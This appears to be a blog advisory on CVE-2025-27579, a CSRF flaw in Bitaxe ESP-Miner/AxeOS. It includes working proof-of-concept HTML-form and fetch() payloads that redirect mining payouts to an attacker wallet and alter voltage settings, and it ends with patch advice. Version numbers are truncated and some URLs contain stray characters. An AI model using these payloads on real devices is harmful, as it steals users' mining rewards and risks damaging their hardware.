In the world of cryptocurrency mining, security is often overlooked in the rush for higher hashrates and better efficiency. But sometimes, a small bug can have big consequences. One fresh example is CVE-2025-27579, a Cross-Site Request Forgery (CSRF) vulnerability in the Bitaxe ESP-Miner running AxeOS versions before 2.5.. This security flaw lets an attacker update the payout (stratumUser) address or even change electrical settings (frequency and voltage). Let’s dive in!
The Basics: What’s Bitaxe ESP-Miner?
Bitaxe is an open-source Bitcoin SHA256 miner that you can run on cheap ESP32 hardware. It’s a popular DIY choice for tinkerers and small miners, especially for learning and experimentation.
Most people control Bitaxe devices from web panels hosted on the device (“AxeOS”). You can set your Bitcoin payout address (stratumUser), tune your miner, and so on. All of these things are accessible through simple HTTP API calls.
## The Vulnerability: CSRF on /api/system
What is CSRF?
Cross-Site Request Forgery (CSRF) is when a malicious webpage tricks your browser into sending commands to a device you’re logged into on your home network.
How does it apply here?
Bitaxe ESP-Miner did not require any authentication (like passwords or CSRF tokens) for the critical HTTP endpoint /api/system. That means any website you visit on the same network can send commands to your miner and change parameters—including your Bitcoin payout address.
The vulnerable endpoint can be accessed like
POST http://BITAXE_LOCAL_IP/api/system
Content-Type: application/json
{
"stratumUser": "attacker_wallet",
"frequency": 300,
"voltage": 850
}
A typical scenario: You’re tweaking your Bitaxe from your laptop or phone, then you browse to a malicious page. The attack runs silently in the background; now your device mines for the hacker’s wallet, not yours.
Quick Exploit Demo
Imagine that your miner’s local IP is 192.168.1.42. Here’s a simple cross-site exploit that a hacker could embed on any webpage—using JavaScript’s fetch API or an HTML form. No special skills needed, just your miner on the network and you visit the malicious page.
Example CSRF Attack (HTML form version)
<html>
<body>
<form action="http://192.168.1.42/api/system"; method="POST" id="hackform">
<input type="hidden" name="stratumUser" value="bc1qattackerwallet1234" />
<input type="hidden" name="frequency" value="450" />
<input type="hidden" name="voltage" value="900" />
</form>
<script>
document.getElementById('hackform').submit();
</script>
</body>
</html>
Or, to do it silently in the background using JavaScript
fetch("http://192.168.1.42/api/system";, {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({
"stratumUser": "bc1qattackerwallet1234",
"frequency": 350,
"voltage": 900
})
});
If you’re on a home network with your Bitaxe running, just visiting a web page like this is enough for an attacker to steal your mining rewards.
Timeline and Patch
- Vulnerable: All Bitaxe ESP-Miner firmware before 2.5. (AxeOS releases)
Fixed in: AxeOS 2.5.
(See commit)
- Details: The fix added basic CSRF mitigations (tokens and/or requiring local authentication).
- Reference: CVE Details (when published)
Update now!
If your Bitaxe miner runs any version below 2.5., upgrade ASAP from the official GitHub releases.
Final Thoughts
The lesson from CVE-2025-27579 is clear: even simple devices like home Bitcoin miners need robust security. If a web interface can change money-related settings without checks, it’s only a matter of time before someone exploits it. For Bitaxe ESP-Miner, the fix was simple, but *the risk* was real.
References
- Bitaxe ESP-Miner GitHub
- CVE-2025-27579 at NVD (once listed)
- AxeOS 2.5. Release
- What is CSRF? – OWASP
Timeline
Published on: 03/03/2025 00:15:43 UTC
Last modified on: 03/04/2025 19:15:38 UTC